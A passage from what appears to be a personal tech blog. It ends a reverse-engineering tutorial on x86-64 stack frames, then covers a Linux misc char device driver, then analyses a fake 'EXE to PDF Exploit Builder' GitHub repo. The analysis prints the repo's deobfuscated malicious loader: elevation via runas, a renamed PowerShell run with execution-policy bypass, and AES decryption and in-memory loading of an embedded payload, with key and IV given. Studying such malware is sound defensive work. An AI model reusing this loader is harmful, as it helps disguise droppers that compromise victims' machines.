Then it adds all the passed arguments and saves the result to another local variable.\n1138: 8b 55 ec mov edx,DWORD PTR [rbp-0x14] 113b: 8b 45 e8 mov eax,DWORD PTR [rbp-0x18] 113e: 01 c2 add edx,eax ; var_edx = 0x1 + 0x2 1140: 8b 45 e4 mov eax,DWORD PTR [rbp-0x1c] 1143: 01 c2 add edx,eax ; var_edx = var_edx + 0x3 1145: 8b 45 e0 mov eax,DWORD PTR [rbp-0x20] 1148: 01 c2 add edx,eax ; var_edx = var_edx + 0x4 114a: 8b 45 dc mov eax,DWORD PTR [rbp-0x24] 114d: 01 c2 add edx,eax ; var_edx = var_edx + 0x5 114f: 8b 45 d8 mov eax,DWORD PTR [rbp-0x28] 1152: 01 c2 add edx,eax ; var_edx = var_edx + 0x6 1154: 8b 45 10 mov eax,DWORD PTR [rbp+0x10] 1157: 01 c2 add edx,eax ; var_edx = var_edx + 0x7 1159: 8b 45 18 mov eax,DWORD PTR [rbp+0x18] 115c: 01 d0 add eax,edx ; var_eax = var_edx + 0x8 115e: 89 45 fc mov DWORD PTR [rbp-0x4],eax ; int sum = var_eax Once all the arguments are added, the sum is stored to another local variable. Another point to note here is that the first 6 arguments were stored to the stack from general purpose registers, while the remaining 2 arguments (that were already on the stack) were referenced directly from the stack\u0026hellip; These values were pushed before the return address, so they sit above rbp and are referenced by rbp+0x10 and rbp+0x18.\nVisually this part of the stack will look something like this\u0026hellip;\n[Stack diagram: rbp+0x18 holds 0x8, rbp+0x10 holds 0x7, rbp+0x08 holds "return address of func1 func", and rbp-0x04 is the first slot below rbp.]
Now comes the third local variable, char ch='A'\u0026hellip; This is the next instruction in our disassembly\n1161: c6 45 f7 41 mov BYTE PTR [rbp-0x9],0x41 ; 0x41 = 65 = A Now we can take another look at the stack and understand which memory locations are used for what\u0026hellip;\n[Stack diagram: the three local variables sit at rbp-0x04 (36, the sum), rbp-0x08 (0) and rbp-0x09 ('A'); the passed arguments 0x1 to 0x6 occupy rbp-0x14 down to rbp-0x28; above them are "return address of prev func", "return address of main func", 0x8, 0x7 and "return address of func1 func".] Then we set eax to the value we want to return to the caller function func1().\n1165: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] And finally, we pop rbp from the stack and return to the instruction in the previous function where we left off. This is called the epilogue.\n1168: 5d pop rbp 1169: c3 ret After this, the stack will look something like this:\n[Stack diagram, high to low addresses: "return address of prev func", "return address of main func", 0x8, 0x7, with rbp, rsp and the 0x10-byte local area marked.]
And in the disassembly, the instruction pointer will be pointing to the next instruction after the func2() function call.\n000000000000116a \u0026lt;func1\u0026gt;: 116a: 55 push rbp 116b: 48 89 e5 mov rbp,rsp 116e: 48 83 ec 10 sub rsp,0x10 1172: 6a 08 push 0x8 1174: 6a 07 push 0x7 1176: 41 b9 06 00 00 00 mov r9d,0x6 117c: 41 b8 05 00 00 00 mov r8d,0x5 1182: b9 04 00 00 00 mov ecx,0x4 1187: ba 03 00 00 00 mov edx,0x3 118c: be 02 00 00 00 mov esi,0x2 1191: bf 01 00 00 00 mov edi,0x1 1196: e8 7e ff ff ff call 1119 \u0026lt;func2\u0026gt; 119b: 48 83 c4 10 add rsp,0x10 \u0026lt;--- instruction pointer 119f: 89 45 fc mov DWORD PTR [rbp-0x4],eax 11a2: 90 nop 11a3: c9 leave 11a4: c3 ret This will then increase the stack pointer by 0x10 (discarding the two 8-byte arguments that were pushed), save the return value to a local variable at rbp-0x4\u0026hellip; and then exit. The leave and ret instructions form the epilogue of the func1() function. After them, the stack will look like this:\n[Stack diagram: only "return address of prev func" remains, with rbp and rsp marked.] And the instruction pointer will be pointing to the next instruction in the main() function.\n00000000000011a5 \u0026lt;main\u0026gt;: 11a5: 55 push rbp 11a6: 48 89 e5 mov rbp,rsp 11a9: b8 00 00 00 00 mov eax,0x0 11ae: e8 b7 ff ff ff call 116a \u0026lt;func1\u0026gt; 11b3: b8 00 00 00 00 mov eax,0x0 \u0026lt;--- instruction pointer 11b8: 5d pop rbp 11b9: c3 ret This instruction will simply set the return value of this function to 0x0, and the next one will pop rbp from the stack. This will collapse the main() function\u0026rsquo;s stack frame, and the following ret will return control to whatever function called main().\nSome of the most common instructions Most of the time, you\u0026rsquo;ll see the same instructions being executed, like push, pop, ret, mov, add, sub, etc.
Let\u0026rsquo;s understand some of those which we will be seeing most of the time.\npush : This decrements the stack pointer and then stores the value at the new top of the stack. (Decrementing the stack pointer means growing the stack, since the stack is upside down and grows towards lower addresses.)\npop : Opposite to the push instruction, this reads the value at the top of the stack into the destination and then increments the stack pointer.\nmov : This is used to copy a value from one location to another. This instruction is quite versatile and can move values from/to registers, stack memory locations, etc\u0026hellip; For example,\nmov rax, 0x10 will move the constant value 0x10 to the rax register.\nmov rdi, rax will move the rax register value to the rdi register.\nmov rdi, [rax] will move the value pointed to by rax to the rdi register. You can think of this as dereferencing a pointer in C.\nmov [rbp-0x8], rax will move the value from the rax register to the memory location pointed to by rbp-0x8.\nadd and sub : These add one value to another or subtract one value from another. For example, add rax, 0x10 will add 0x10 to the value in the rax register, and the result will be stored in the rax register. sub rax, 0x10 will subtract 0x10 from the value in the rax register, and the result will be stored in the rax register. lea : This Loads the Effective Address (lea) into a destination register. It is used to copy the address of a memory location, not the value stored there. For example, lea rax, [rbp-0x8] will load the address rbp-0x8 into the rax register.\ncmp : This (compare instruction) performs the same subtraction as the sub instruction, but instead of saving the result into the first operand, it only updates the status flags (zero flag, sign flag, carry flag, etc.). For example, cmp rax, 0x3 with rax holding 1 computes 1 - 3 = -2, which sets the sign flag and leaves the zero flag clear.\njmp : Compare instructions are usually followed by jump instructions. A plain jmp always jumps to the address given in its argument, while the conditional jumps check the flags set above and jump accordingly.
There are many types of conditional jump instructions like jump equal (je), jump not equal (jne), jump greater (jg), jump less (jl), etc. These instructions actually manipulate the instruction pointer to make the jump. If the condition matches, the jump is taken by setting the instruction pointer to the memory location from the argument; otherwise the instruction pointer simply moves on to the next instruction.\ncall : This instruction calls a function. This is equivalent to push rip (save the address of the next instruction on the stack) followed by jmp func.\nleave/ret : These appear at the end of almost every function. The current stack frame is destroyed either by incrementing the stack pointer or, with leave, by moving the stack pointer (rsp) to the location pointed to by the base pointer (rbp) and then popping the base pointer. This leaves the return address at the top of the stack; ret then pops it from the stack into rip, returning to that address.\nConclusion You\u0026rsquo;re all set! This could be a lot to take in all at once. But at least you now have a rudimentary grasp of how C code is compiled and how everything functions at the low level. I hope you now have enough information and self-assurance to begin your adventures into reverse engineering.\nHave fun!! ✌️\n","permalink":"https://ayedaemon.github.io/post/2022/09/intro-to-re/","summary":"Steps to generate a binary When we write a program using a language like C, it is not C source code which really gets executed. This C code passes through many steps and finally a binary file is generated out of it. 
This binary file is what gets executed on any computer.\nThere are many steps through which a C code is converted into a binary file:-\nPre-processing Compilation Assemble Linking Let\u0026rsquo;s follow these steps one by one to understand what they do to the C code and how a binary is generated via this.","title":"Intro to RE: C : part-1"},{"content":"This is Task 06 of the Eudyptula Challenge ------------------------------------------ Nice job with the module loading macros, those are tricky, but a very valuable skill to know about, especially when running across them in real kernel code. Speaking of real kernel code, let\u0026#39;s write some! The task this time is this: - Take the kernel module you wrote for task 01, and modify it to be a misc char device driver. The misc interface is a very simple way to be able to create a character device, without having to worry about all of the sysfs and character device registration mess. And what a mess it is, so stick to the simple interfaces wherever possible. - The misc device should be created with a dynamic minor number, no need running off and trying to reserve a real minor number for your test module, that would be crazy. - The misc device should implement the read and write functions. - The misc device node should show up in /dev/eudyptula. - When the character device node is read from, your assigned id is returned to the caller. - When the character device node is written to, the data sent to the kernel needs to be checked. If it matches your assigned id, then return a correct write return value. If the value does not match your assigned id, return the \u0026#34;invalid value\u0026#34; error value. - The misc device should be registered when your module is loaded, and unregistered when it is unloaded. - Provide some \u0026#34;proof\u0026#34; this all works properly. Device drivers?? 
When a user adds a new part to a computer system, such as a printer, the computer doesn\u0026rsquo;t immediately understand how to connect with it and identify it. This requires some sort of translator that can mediate between the component and our operating system/computer. These translators are called device drivers. Device drivers, which are usually small pieces of software, tell the operating system and other software how to interface with a piece of hardware.\nFor example, in some laptops there is a dedicated CAPSLOCK LED, which toggles to indicate the state of the key itself. It seems like a really easy and straightforward concept. A key and an LED are there; when the key is pressed, the LED toggles; when the key is pressed again, the LED toggles once more. However, there is a lot more going on than meets the eye.\nWhen the CAPSLOCK key is pressed, a userspace application connects with the relevant mediator/translator and transmits the message to it. The translator then manages this message, analyses it, and executes some operations on the associated hardware device (LED).\n[Diagram: Program (USERSPACE) → Device Driver (KERNEL) → LED device (HARDWARE).] Now we know what device drivers are and how they fit into the bigger picture. But that\u0026rsquo;s not all!\nIn linux, these device drivers are usually implemented as kernel modules that provide an interface between the actual hardware device and the userspace \u0026ldquo;files\u0026rdquo;. 
On the basis of speed, volume and the way the data transferred between userspace and the device is organized, device drivers are categorized under 2 types. (Note:- There is one more type of device called a network device, but for this article it\u0026rsquo;s better not to start discussing those)\nCharacter devices (accessed as a stream of bytes; typically slow and managing small amounts of data; used for keyboards, mice, etc) Block devices (accessed in fixed-size blocks; fast and able to manage bulk data with ease and efficiency; used mainly for storage devices) A typical linux ls -l command gives us a lot of information about the kind of device each file is.\nls -l /dev ## Output (snipped) # lrwxrwxrwx 1 root root 3 Sep 16 19:56 cdrom -\u0026gt; sr0 # brw-rw---- 1 root disk 8,0 Sep 16 19:56 sda # brw-rw---- 1 root disk 8,1 Sep 16 19:56 sda1 # brw-rw---- 1 root disk 8,2 Sep 16 19:56 sda2 # brw-rw----+ 1 root optical 11,0 Sep 16 19:56 sr0 # crw--w---- 1 root tty 4,0 Sep 16 19:56 tty0 # crw-rw-rw- 1 root root 1,5 Sep 16 19:56 zero The first character of each line in the above output gives the type of the file, for example:\nl indicates that the file is a link file. b is the indicator for a block device. c is for a character device. Another important thing this output shows is the unique identifier associated with each device. These identifiers consist of two comma separated numbers - the major number and the minor number.\nThe major number identifies the driver associated with the device. In the output above, sda, sda1 and sda2 are all managed by driver 8. The kernel uses the major number at open time to dispatch execution to the appropriate driver, while the minor number is used by the driver (specified by the major number) to differentiate among the multiple devices it handles.\nIf you wish to read more about this, here is a good article about major and minor numbers.1\nAt this point we can take a guess that these numbers are not random, but have a meaning. 
Here 2 is the official registry of allocated device numbers, which we will have to keep in mind before writing a device driver.\nWhat is a misc char device driver?? Well, it\u0026rsquo;s quite clear, isn\u0026rsquo;t it? A Misc driver is a driver that is used for miscellaneous devices. 🤭🤭\nThey mostly behave like char drivers, but they are unique in that we don\u0026rsquo;t need to worry about all the complicated number registration issues. We can simply write our driver module and assign it a static minor number or ask the kernel to provide a dynamic minor number. All the misc devices share the common major number 10. And just like a char device, a misc device supports all the file operation calls like open, read, write, close and IOCTL.\nThis is quite useful when we want to write a basic driver for a simple functionality and save ourselves from the mess of allocating and registering a major number.\nYour first misc char device driver In the linux kernel source, struct miscdevice is defined in the linux/miscdevice.h file\nstruct miscdevice { int minor; const char *name; const struct file_operations *fops; struct list_head list; struct device *parent; struct device *this_device; const struct attribute_group **groups; const char *nodename; umode_t mode; }; For this task, we will need only 3 members of the above struct.\nint minor: To allocate the minor number, either static or dynamic. const char *name: To give the name to the device. const struct file_operations *fops : To allow custom file operations like read and write. This will allow us to write a basic module that works as a misc device driver and can be loaded into and unloaded from the kernel. 
Create a file with name misc_char_device_driver.c and paste the below code in that.\n#include \u0026lt;linux/miscdevice.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; // message formatting - optional #define pr_fmt(fmt) KBUILD_MODNAME \u0026#34;: \u0026#34; fmt // Device name #define MISC_DEVICE_NAME \u0026#34;eudyptula\u0026#34; // Misc Device structure static struct miscdevice my_misc_device = { .minor = MISC_DYNAMIC_MINOR, .name = MISC_DEVICE_NAME, }; // Entry point static int hello_world_init(void) { int ret = misc_register(\u0026amp;my_misc_device); pr_info(\u0026#34;Hello from module; Return %d\\n\u0026#34;, ret); if (ret \u0026lt; 0) return -EFAULT; return 0; } // Exit point static void hello_world_exit(void) { misc_deregister(\u0026amp;my_misc_device); pr_info(\u0026#34;Exiting from module\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task6\u0026#34;); Compile and load module using below Makefile\nKDIR := /lib/modules/$(shell uname -r)/build all: clean build install build: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: uninstall $(MAKE) -C $(KDIR) M=$(PWD) clean install: - sudo insmod misc_char_device_driver.ko sudo lsmod | grep misc_char_device_driver uninstall: - sudo rmmod misc_char_device_driver After compiling the above module and loading it, this will give me a character device in the /dev/ directory.\ncrw------- 1 root root 10, 122 Sep 17 13:21 /dev/eudyptula We can see that the file is a character type because of the initial c indicator. Also the major number is 10, which is the common major number for all misc devices. 
The minor number in our case is random but if you want feel free to allocate a static one.\nWhen loading and unloading this module, it\u0026rsquo;ll also create some logs because of the pr_info function calls. These logs can be viewed via dmesg | grep misc_char_device_driver command.\n[17543.585039] misc_char_device_driver: Hello from module; Return 0 [17583.624421] misc_char_device_driver: Exiting from module Adding file operations to driver Now we have a working character device that just exists but it does not support any file operations at this point. We can add the required file operations using the const struct file_operations *fops member of struct miscdevice. In linux kernel, struct file_operations is defined at linux/fs.h file. There are many file operations that are supported but we only need read and write for now.\nOur new code will look something like this\n// SPDX-License-Identifier: GPL-2.0+ #include \u0026lt;linux/miscdevice.h\u0026gt; #include \u0026lt;linux/fs.h\u0026gt; #include \u0026lt;linux/module.h\u0026gt; #include \u0026lt;linux/init.h\u0026gt; #include \u0026lt;linux/kernel.h\u0026gt; // message formatting #define pr_fmt(fmt) KBUILD_MODNAME \u0026#34;: \u0026#34; fmt // Device name #define MISC_DEVICE_NAME \u0026#34;eudyptula\u0026#34; // Custom read operation static ssize_t misc_read(struct file *filp, char __user *buff, size_t cnt, loff_t *offt) { pr_info(\u0026#34;Read operation performed\\n\u0026#34;); return cnt; } // Custom write operation static ssize_t misc_write(struct file *filp, const char __user *buff, size_t cnt, loff_t *offt) { pr_info(\u0026#34;Write operation performed\\n\u0026#34;); return cnt; } // Operations structure const struct file_operations misc_fops = { .read = misc_read, .write = misc_write, }; // Misc Device structure static struct miscdevice my_misc_device = { .minor = MISC_DYNAMIC_MINOR, .name = MISC_DEVICE_NAME, .fops = \u0026amp;misc_fops, }; // Entry point static int hello_world_init(void) { int ret = 
misc_register(\u0026amp;my_misc_device); pr_info(\u0026#34;Hello from module; Return %d\\n\u0026#34;, ret); if (ret \u0026lt; 0) return -EFAULT; return 0; } // Exit point static void hello_world_exit(void) { misc_deregister(\u0026amp;my_misc_device); pr_info(\u0026#34;Exiting from module\\n\u0026#34;); } module_init(hello_world_init); module_exit(hello_world_exit); MODULE_LICENSE(\u0026#34;GPL\u0026#34;); MODULE_AUTHOR(\u0026#34;ayedaemon\u0026#34;); MODULE_DESCRIPTION(\u0026#34;Eudyptula task6\u0026#34;); After compiling the above module and loading it, the device gains read and write functionality. This can be tested by reading from and writing to the /dev/eudyptula device now.\n## Read operation dd if=/dev/eudyptula of=/dev/null count=1 ## Output in `dmesg` # [23375.547714] misc_char_device_driver: Read operation performed ## Write operation dd if=/dev/zero of=/dev/eudyptula count=1 ## Output in `dmesg` # [23353.947901] misc_char_device_driver: Write operation performed Userspace \u0026lt;\u0026ndash;[data]\u0026ndash;\u0026gt; kernel module Now it\u0026rsquo;s time for the ultimate move. We have a misc character device driver that supports read and write operations, but it doesn\u0026rsquo;t actually send any data from kernel to userland or vice-versa. This is because there is no shared memory where we can simply pass variables or pointers and do whatever we intend to do with them.\nThings are a bit different when we have to transfer data between the kernel layer and userspace. A complete explanation is out of scope for this article, but the short version is that the transfer is done with the help of 2 buffers, one in the kernel and the other in userspace. The userspace program fills data into its buffer and the address of that buffer is passed to the kernel. The kernel then copies the data from that buffer into its own buffer, and with that we are done. 
Here is a stackoverflow thread on the same topic.\nBut we need not worry about all this complexity; for us it\u0026rsquo;ll be as hard as calling the copy_from_user() 3 and copy_to_user() 4 functions from our kernel module.\nWith this, our new read and write functions will look something like below:-\n// Custom read operation static ssize_t misc_read(struct file *filp, char __user *buff, size_t cnt, loff_t *offt) { char *my_id = \u0026#34;ayedaemon\\n\u0026#34;; int my_id_len = strlen(my_id)+1; pr_info(\u0026#34;[begin] offt=%lld\\n\u0026#34;, *offt); if (*offt != 0) return 0; if ((cnt \u0026lt; my_id_len) || // Check the size (copy_to_user(buff, my_id, my_id_len))) // Copy to buffer return -EINVAL; *offt += my_id_len; pr_info(\u0026#34;[ end ] offt=%lld\\n\u0026#34;, *offt); return my_id_len; } // Custom write operation static ssize_t misc_write(struct file *filp, const char __user *buff, size_t cnt, loff_t *offt) { char *my_id = \u0026#34;ayedaemon\u0026#34;; int my_id_len = strlen(my_id); char temp[my_id_len+1]; // size = 10; including the null byte if ((cnt != my_id_len+1) || // Check input size (mainly to prevent overflows) (copy_from_user(temp, buff, my_id_len)) || // Copy 9 bytes from userland (strncmp(temp, my_id, my_id_len))) // finally, compare 9 bytes return -EINVAL; else return cnt; } In the above code, the read function first checks the size of the buffer, copies the my_id value to the userspace buffer, and returns the number of bytes it actually copied (my_id_len rather than the requested cnt, so the caller never sees bytes the driver did not write). In the write function, we check the input size, copy the data from userspace to the temp buffer and then compare it with my_id. 
There are other things in the code but those are for extra checks, just to make sure the module does not crash.\nWe can now test the code with our makefile and everything should be as we are expecting it to be.\n## Read the value from device cat /dev/eudyptula ## Output # ayedaemon #-=-=-=-=-=-=-=-=-=-=-=-=-=-= ## Write \u0026#34;ayedaemon\u0026#34; to the device echo \u0026#34;ayedaemon\u0026#34; \u0026gt; /dev/eudyptula ## Output - No output #-=-=-=-=-=-=-=-=-=-=-=-=-=-= ## Write anything apart from \u0026#34;ayedaemon\u0026#34; echo \u0026#34;something\u0026#34; \u0026gt; /dev/eudyptula ## Output - Gives error # bash: echo: write error: Invalid argument Now we have achieved the goal of this task, let\u0026rsquo;s check the formatting of the code so that it follows the proper coding conventions that linux kernels developers have set.\n./linux/scripts/checkpatch.pl -f misc_char_device_driver.c ## Output # total: 0 errors, 0 warnings, 99 lines checked # misc_char_device_driver.c has no obvious style problems and is ready for submission. Conclusion There are mainly 2 types of device drivers - character and block. But there are also network device drivers which are completely different from the ones we discussed here. This article tries to provide basic introduction to misc character devices and details about how to write your own driver. 
All the code can be found in the github repo here 5 for you to playaround.\nhttps://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch03s02.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/html/latest/admin-guide/devices.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/htmldocs/kernel-api/API---copy-from-user.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://www.kernel.org/doc/htmldocs/kernel-api/API---copy-to-user.html\u0026#160;\u0026#x21a9;\u0026#xfe0e;\nhttps://github.com/ayedaemon/eudyptula\u0026#160;\u0026#x21a9;\u0026#xfe0e;\n","permalink":"https://ayedaemon.github.io/post/2022/09/eudyptula-task-6/","summary":"This is Task 06 of the Eudyptula Challenge ------------------------------------------ Nice job with the module loading macros, those are tricky, but a very valuable skill to know about, especially when running across them in real kernel code. Speaking of real kernel code, let\u0026#39;s write some! The task this time is this: - Take the kernel module you wrote for task 01, and modify it to be a misc char device driver. The misc interface is a very simple way to be able to create a character device, without having to worry about all of the sysfs and character device registration mess.","title":"Eudyptula Task 6"},{"content":"What is a malware? Malware, a portmanteu meaning malicious software, refers to any program that was created with the specific goal of doing harm. Your digital environment is vulnerable to a variety of terrible things, including attempts to compromise your computer or network, leak confidential data, and gain illegal access. These issues can occasionally be brought on by common software defects, but when malware is to blame, it poses a major risk to online users and businesses.\nYes, a virus is a malware.. Malware is an umbrella term, with virus being just one of types among many others.\nCommon obfuscation techniques? 
Obfuscation is a software engineering technique used by hackers and security teams mainly to conceal the written code. There are different motivations to use obfuscation, but the aim is the same: to make the source code unintelligible and difficult to comprehend and interpret.\nA few of the common obfuscation techniques are\nDead-code insertion Code flow obfuscation Variable renaming String encryption etc. Journey begins! I always like trying out new tools and understanding how they work behind the scenes. And it was about time I got my eyes on a github repo that said EXE TO PDF Exploit Builder.\nThis was enough to make me open the repo and look more into it. 😁\nLucifer on github This repo was owned by Luci441\u0026hellip; But for some reason this looked suspicious to me.\nThe account is only a few days old. The owner claims to be the owner of Hackforums. And it only had 6 followers\u0026hellip; The Hackforums twitter account had 11.2K followers at the time of writing this blog. Anyways, I was more interested in looking at how that EXE to PDF program worked. So I moved directly to the repo and looked at the source code. The README contained something that made me more suspicious\u0026hellip;\nWhy make such a tool obfuscated?? Why no VMs supported?? Who makes such a tool and intentionally makes it unusable in VMs?\nAnd there is no how to get started section for this tool, so I\u0026rsquo;ll have to read the code and understand it. Good heavens\u0026hellip; Finally I got started with the ExploitBuilder.bat file to read the source code.\nThere are a lot of things that raise doubt, but that\u0026rsquo;s not why you are here. Are you?\nSimplifying initial payload After taking a look at all the files inside the repo, it was safe to assume that there was absolutely no need for the C header files (.h files). They were there just to make everything a bit more convincing.\nFirst things first, I forked the repo and removed all the extra files. 
The forked repo can be found here -\u0026gt; https://github.com/ayedaemon/Exe-to-pdf. Interestingly, there was a Pull Request to the original repo that mentioned the malware it contained. But I won\u0026rsquo;t talk about it and ruin the journey ;)\nThe most interesting file in the whole repo was the batch file, and it was obfuscated. The whole thing was divided into multiple variables, and the complete command was then constructed at runtime by concatenating those jumbled strings. I gotta admit there is a lot one can do with strings nowadays.\nI cleaned most of the lines with sed and then printed them with python. Maybe there is a faster and better way to clean it. I\u0026rsquo;ll be happy to hear if you have any alternative ways to do it easily.\nHere is the python notebook that shows the initial deobfuscation. \u0026ndash;\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/notebook.ipynb\nAfter this, I had the clean payload that was much, much easier to read. Here is the clean payload \u0026ndash;\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/clean_payload.txt\n@echo off net file if not %errorlevel%==0 ( powershell -noprofile -ep bypass -command Start-Process -FilePath \u0026#39;%0\u0026#39; -ArgumentList \u0026#39;%cd%\u0026#39; -Verb runas \u0026amp; exit /b ) cd /d %1 copy C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /y %~dp0%~nx0.exe\u0026#39; cls cd %~dp0 %~nx0.exe -noprofile -windowstyle hidden -ep bypass -command $eaqcw = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;%~f0\u0026#39;).Split([Environment]::NewLine);foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(\u0026#39;:: \u0026#39;)) { $BMjJe = $VtoBl.Substring(3); break; }; };$VGGCQ = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($BMjJe);$hbvqO = New-Object System.Security.Cryptography.AesManaged;$hbvqO.Mode = 
[System.Security.Cryptography.CipherMode]::CBC;$hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$hbvqO.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;);$hbvqO.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;);$CfOAS = $hbvqO.CreateDecryptor();$VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length);$CfOAS.Dispose();$hbvqO.Dispose();$YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ);$iJFSw = New-Object System.IO.MemoryStream;$uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, [IO.Compression.CompressionMode]::Decompress);$uwkaq.CopyTo($iJFSw);$uwkaq.Dispose();$YVjlv.Dispose();$iJFSw.Dispose();$VGGCQ = $iJFSw.ToArray();$WtHIs = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($VGGCQ);$iFZWS = $WtHIs.EntryPoint;$iFZWS.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) exit /b Let\u0026rsquo;s try and understand this script line by line\u0026hellip; just like an interpreter 😉\n@echo off prevents the prompt and contents of the batch file from being displayed, so that only the output is visible. The @ hides the echo off command itself as well. Whether you are into bad things or into preventing them, this is the de facto starting command for batch scripts.\nnet file, without any extra arguments, displays all the open shared files on a server and their lock IDs (if any). I\u0026rsquo;m not completely sure why it is used here, but since the command fails without administrator rights, it looks like a check for elevated privileges.\nThen it checks errorlevel; if it is not 0, it runs a powershell command. I\u0026rsquo;m not very good with Windows and its tools at this point, but it is clear that the command relaunches this same script with -Verb runas (that is, elevated) and uses -ep bypass to get around the powershell execution policy. 
Sus it is, isn\u0026rsquo;t it?\nAfter changing directory (to where it can put all its mess without being sus), it copies the powershell binary and saves it under another name.\nIt then clears the screen to remove all the output generated. The above tasks happen in a flash, and you will probably just see a blink on the terminal if you have Veronica Seider’s Super Power. Bad Joke, I know.\nEventually, it\u0026rsquo;ll use the copied \u0026amp; renamed powershell to run some -command with the -ep bypass flag. After a bit of google-fu I got to know about a few common techniques used to bypass the powershell execution policy. I found this blog 1 concise and helpful on the topic.\nde-obfuscating powershell I copied the powershell -command to another file, just to make more sense of it. And it looked better than before.\n$eaqcw = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;%~f0\u0026#39;).Split([Environment]::NewLine); foreach ($VtoBl in $eaqcw) { if ($VtoBl.StartsWith(\u0026#39;:: \u0026#39;)) { $BMjJe = $VtoBl.Substring(3); break; }; }; $VGGCQ = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($BMjJe); $hbvqO = New-Object System.Security.Cryptography.AesManaged; $hbvqO.Mode = [System.Security.Cryptography.CipherMode]::CBC; $hbvqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $hbvqO.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;); $hbvqO.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;); $CfOAS = $hbvqO.CreateDecryptor(); $VGGCQ = $CfOAS.TransformFinalBlock($VGGCQ, 0, $VGGCQ.Length); $CfOAS.Dispose(); $hbvqO.Dispose(); $YVjlv = New-Object System.IO.MemoryStream(, $VGGCQ); $iJFSw = New-Object System.IO.MemoryStream; $uwkaq = New-Object System.IO.Compression.GZipStream($YVjlv, 
[IO.Compression.CompressionMode]::Decompress); $uwkaq.CopyTo($iJFSw); $uwkaq.Dispose(); $YVjlv.Dispose(); $iJFSw.Dispose(); $VGGCQ = $iJFSw.ToArray(); $WtHIs = [System.Reflection.Assembly]::(\u0026#39;daoL\u0026#39;[-1..-4] -join \u0026#39;\u0026#39;)($VGGCQ); $iFZWS = $WtHIs.EntryPoint; $iFZWS.Invoke($null, (, [string[]] (\u0026#39;%*\u0026#39;))) If I did not mention this earlier, I\u0026rsquo;m not good with windows OS and powershell scripting, but with decent knowledge about programming/scripting languages and a text editor of choice, it was not so hard to make this code understandable. De-obfuscated file can be found on github here -\u0026gt; https://github.com/ayedaemon/Exe-to-pdf/blob/main/powershell_command_deobfuscated.txt\n## Read the initial payload file $payload = [System.IO.File]::(\u0026#39;txeTllAdaeR\u0026#39;[-1..-11] -join \u0026#39;\u0026#39;)(\u0026#39;/ExploitBuilder.bat\u0026#39;).Split([Environment]::NewLine); ## Get the line starting with `:: `; This also acts as the comment in batch scripting foreach ($each_line in $payload) { if ($each_line.StartsWith(\u0026#39;:: \u0026#39;)) { $comment_line = $each_line.Substring(3); break; }; }; ## Decode the comment line with \u0026#34;Military grade AES encryption\u0026#34; $decoded_comment_line = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)($comment_line); $cryptObj = New-Object System.Security.Cryptography.AesManaged; $cryptObj.Mode = [System.Security.Cryptography.CipherMode]::CBC; $cryptObj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $cryptObj.Key = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;wYPqphQqHyVIeW2CaPqkTUCy/0ecJs6agKij7Q3HRY4=\u0026#39;); $cryptObj.IV = [System.Convert]::(\u0026#39;gnirtS46esaBmorF\u0026#39;[-1..-16] -join \u0026#39;\u0026#39;)(\u0026#39;E55hmIoW8UIQx1ajzTvfAA==\u0026#39;); $decryptObj = $cryptObj.CreateDecryptor(); $decrypted_comment_line = 
